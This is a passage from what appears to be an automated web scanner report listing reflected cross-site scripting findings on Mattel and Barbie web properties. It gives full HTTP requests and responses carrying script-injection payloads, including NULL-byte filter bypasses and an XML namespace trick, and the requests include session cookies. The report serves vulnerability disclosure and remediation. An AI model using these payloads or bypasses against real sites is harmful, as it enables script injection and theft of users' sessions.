Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43932


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="productId=3738867&e95e4"-alert(1)-"ba8774a4224=1";
   </script>
...[SNIP]...

1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7af6--><script>alert(1)</script>e0edaf36a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/wishlist/wishlist.jsp?a7af6--><script>alert(1)</script>e0edaf36a48=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:06 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36782


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/
...[SNIP]...
<!-- === Request Query String: a7af6--><script>alert(1)</script>e0edaf36a48=1 -->
...[SNIP]...

1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cdef"-alert(1)-"d3ac09be35f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cdef"-alert(1)-"d3ac09be35f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /product/wishlist/wishlist.jsp?%008cdef"-alert(1)-"d3ac09be35f=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:05 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36756


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="%008cdef"-alert(1)-"d3ac09be35f=1";
   </script>
...[SNIP]...

1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e26"-alert(1)-"8e17875d268 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storeLocator/index.jsp?79e26"-alert(1)-"8e17875d268=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40857


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="79e26"-alert(1)-"8e17875d268=1";
   </script>
...[SNIP]...

1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 163a7--><script>alert(1)</script>cd69434ff01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /storeLocator/index.jsp?163a7--><script>alert(1)</script>cd69434ff01=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40821


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 163a7--><script>alert(1)</script>cd69434ff01=1 -->
...[SNIP]...

1.71. http://videogirlcontest.barbie.com/get_contest_entries [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The value of the count request parameter is copied into the XML document as plain text between tags. The payload dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5 was submitted in the count parameter. This input was echoed as dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /get_contest_entries?xml=1&count=5dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=1&page=1 HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3275
Content-Type: text/xml; charset=utf-8
Expires: Thu, 23 Dec 2010 00:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Dec 2010 00:12:26 GMT
Connection: close
Set-Cookie: session=4d1293eaf95db56a; path=/; expires=Thu, 23-Dec-2010 00:42:26 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx12.f.1800/af620/2ea/b9b0b736.a08f5b616eda43046f14d66460fdad9f">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...
<entries_per_page>5dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5</entries_per_page>
...[SNIP]...

1.72. http://videogirlcontest.barbie.com/get_contest_entries [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The value of the page request parameter is copied into the XML document as plain text between tags. The payload %0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 was submitted in the page parameter. This input was echoed as 77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /get_contest_entries?xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=2&page=1%0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 6787
Content-Type: text/xml; charset=utf-8
Expires: Thu, 23 Dec 2010 00:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Dec 2010 00:12:31 GMT
Connection: close
Set-Cookie: session=4d1293ee9ab6f3c0; path=/; expires=Thu, 23-Dec-2010 00:42:30 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx09.f.1800/af620/2ee/edfd9fd7.aa1ea1d7114adff9340e018a8bb03ea6">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...
<page_number>1.77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7</page_number>
...[SNIP]...

1.73. http://shop.mattel.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714b8"><script>alert(1)</script>8c42dd9f9f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45370


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3;u2=1;u3=;u1=;ord=1;num=99400337?" width="1" height="1" frameborder="0">
...[SNIP]...

1.74. http://shop.mattel.com/cartHandler/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cartHandler/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae536"><script>alert(1)</script>9892daaa3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cartHandler/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:34 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45101


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd;u2=1;u3=;u1=;ord=1;num=40158534?" width="1" height="1" frameborder="0">
...[SNIP]...

1.75. http://shop.mattel.com/category/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83600"><script>alert(1)</script>03a94f135fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp?categoryId=3741286 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39375


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd;u2=5;u3=;u1=;ord=1;num=88359962?" width="1" height="1" frameborder="0">
...[SNIP]...

